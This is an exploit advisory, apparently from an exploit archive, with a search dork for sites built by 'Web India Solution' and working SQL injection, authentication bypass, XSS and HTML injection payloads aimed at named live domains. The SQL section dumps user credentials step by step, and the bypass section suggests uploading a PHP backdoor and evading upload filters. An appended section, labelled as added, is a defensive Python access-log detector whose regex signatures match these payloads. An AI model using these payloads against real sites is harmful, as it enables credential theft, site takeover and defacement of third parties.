###############################################################################################
# Title : Design By : Web India Solution.Net Basic SQLI || SQLi Authentication bypass || XSS || Html injection
# Founder : Dj3Bb4rAn0n ( bassem ) I quit facebook :)
# Date : 11/06/2019
# Home : Annaba ( Algeria )
# Tested on : Linux ( Backbox )
# Vendor : https://webindiasolution.net
# Dork : allintext:"Design By : Web India Solution.Net Basic SQLI || SQLi Authentication bypass || XSS || Html injection"
################################################################################################
# PoC
[ + ] Basic Sql injection
----------------------------
http://www.kanchanclasses.in/course-category.php?id=1
The vulnerable parameter here is the [ id ] parameter
Payload : single quote [ ' ]
Query fix (comment terminator) : ( -- -)
If we take a look at the source of the index.php page, we can find the admin panel path in this HTML tag:
<img src="kanchanclasses@admin/thumbs/pizap.com15380083585061.png" width="1920" height="1060" alt="image" class="img">
admin panel path : http://localhost:80/kanchanclasses@admin/
Injection
-----------
| + | number of columns : [ 9 ]
# http://www.kanchanclasses.in/course-category.php?id=1' order by 9 -- -
| + | Vulnerable columns : 2 , 3 , 7
# http://www.kanchanclasses.in/course-category.php?id=-1' union all select 1,2,3,4,5,6,7,8,9 -- -
| + | Getting tables : about,accordian,category,contact,course,gallery,home_welcome_text,image,marque,member,product,seo,slider,user,users,video,whoweare
# http://www.kanchanclasses.in/course-category.php?id=-1' union all select 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database() -- -
| + | Getting columns from the users table : id,username,password,name,email,mobile,salt,active
# http://www.kanchanclasses.in/course-category.php?id=-1' union all select 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_name="users" -- -
| + | dumping data from the columns [ username , password ]
# http://www.kanchanclasses.in/course-category.php?id=-1' union all select 1,group_concat(0x557365726e616d65203a20,username,0x3a,0x3a,0x50617373776f7264203a20,password),3,4,5,6,7,8,9 from users -- -
[ + ] Sql injection authentication bypass
-------------------------------------------
# If you take another look at the source code of the index.php page, you will find the admin panel path stored there,
# exactly inside the IMG HTML tag:
# <img src="matadmin/images/slider/slider3-299113911.jpg" alt="slider1" data-bgposition="center top" data-bgfit="cover" data-bgrepeat="no-repeat">
# Admin panel path : http://localhost:80/matadmin/
# After finding the admin panel path, try injecting this query [ '=' 'or' ] as the payload in the username and password input fields, and you will be logged into the admin panel
page without knowing the username or the password
# Payload : '=' 'or'
# Search for any upload input, then try to upload your PHP backdoor to the server; if the server blocks your POST request, try to bypass it by changing the extension
using a proxy tool like Burp Suite or Tamper Data
[ + ] Reflected cross site scripting | XSS |
----------------------------------------------
# Spider all parameters on the website and replace the value of each parameter with an arbitrary marker, for example [ FOO ], then send the request. If FOO is reflected back to you
in the response, the parameter may be vulnerable to XSS. To confirm whether it is vulnerable, inject a JavaScript payload; if it is reflected back to you unencoded,
the parameter is vulnerable to XSS. In this case I used the alert payload <script>alert("XSS");</script>
# The vulnerable parameter is [ msg ]
# Payload : <script>alert("XSS");</script>
# GET /book-now.php?book=<script>alert("XSS")</script> HTTP/1.1
# http://www.kanchanclasses.in/kanchanclasses@admin/index.php?msg=%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
# Impact : Attackers exploit this vulnerability by sending the victim a page containing malicious JavaScript, which can steal sensitive data such as cookies and passwords and redirect
victims to other malicious pages
[ + ] HTML injection
------------------
# http://rs-travels.in/book-now.php?book=VOLVO_WITH_WASHROOM
# Vulnerable parameter is | package |
# payload : <marquee>hacked by bassem</marquee>
# http://rs-travels.in/book-now-tour.php?package=%3Cmarquee%3Ehacked%20by%20bassem%3C/marquee%3E
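Added example, not part of this advisory or of the vendor's code: a Python access-log detector for the request shapes reported in the SQL injection, XSS and HTML injection sections above (a quote appended to id, ORDER BY column counting, UNION SELECT against information_schema, the -- - comment terminator, <script> in msg, <marquee> in package). The log lines, client address, paths and signature names are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines (not from the advisory); the targets reuse
# the reported payload shapes, URL-encoded as a server logs them. 203.0.113.0/24 is
# the documentation address range.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Jun/2019:10:00:01 +0000] "GET /course-category.php?id=1 HTTP/1.1" 200 5120
203.0.113.5 - - [11/Jun/2019:10:00:02 +0000] "GET /course-category.php?id=1' HTTP/1.1" 500 210
203.0.113.5 - - [11/Jun/2019:10:00:03 +0000] "GET /course-category.php?id=1'%20order%20by%209%20--%20- HTTP/1.1" 200 5120
203.0.113.5 - - [11/Jun/2019:10:00:04 +0000] "GET /course-category.php?id=-1'%20union%20all%20select%201,group_concat(table_name),3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=database()%20--%20- HTTP/1.1" 200 6010
203.0.113.5 - - [11/Jun/2019:10:00:05 +0000] "GET /admin/index.php?msg=%3Cscript%3Ealert(%22XSS%22);%3C/script%3E HTTP/1.1" 200 800
203.0.113.5 - - [11/Jun/2019:10:00:06 +0000] "GET /book-now-tour.php?package=%3Cmarquee%3Etest%3C/marquee%3E HTTP/1.1" 200 800
203.0.113.5 - - [11/Jun/2019:10:00:07 +0000] "GET /course-category.php?id=2 HTTP/1.1" 200 5100
"""

# Request line inside the quoted part of a combined-log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Signatures are matched against the URL-decoded request target; the labels are my own.
SIGNATURES = {
    "sqli-quote-probe": re.compile(r"[?&]id=-?\d+'"),                  # id=1'
    "sqli-order-by-probe": re.compile(r"'\s*order\s+by\s+\d+", re.I),  # column counting
    "sqli-union-select": re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I),
    "sqli-schema-enum": re.compile(r"information_schema\.(tables|columns)", re.I),
    "sqli-comment-terminator": re.compile(r"--\s+-"),                   # the "-- -" tail
    "xss-script-tag": re.compile(r"</?script\b", re.I),
    "html-injection-tag": re.compile(r"<marquee\b", re.I),
}

def classify_request(line):
    """Return the signature names matched by one log line (empty list = clean)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    target = unquote_plus(m.group("target"))  # %3C -> <, %20 -> space, %22 -> "
    return [name for name, rx in SIGNATURES.items() if rx.search(target)]

def scan_log(text):
    """Return (line_number, [signatures]) for every flagged line in the log text."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        tags = classify_request(line)
        if tags:
            hits.append((number, tags))
    return hits

if __name__ == "__main__":
    for number, tags in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(tags)}")
```

The authentication bypass payload travels in the POST body of the login form, which a standard access log does not record, so that check needs request-body logging or a WAF rather than this scanner.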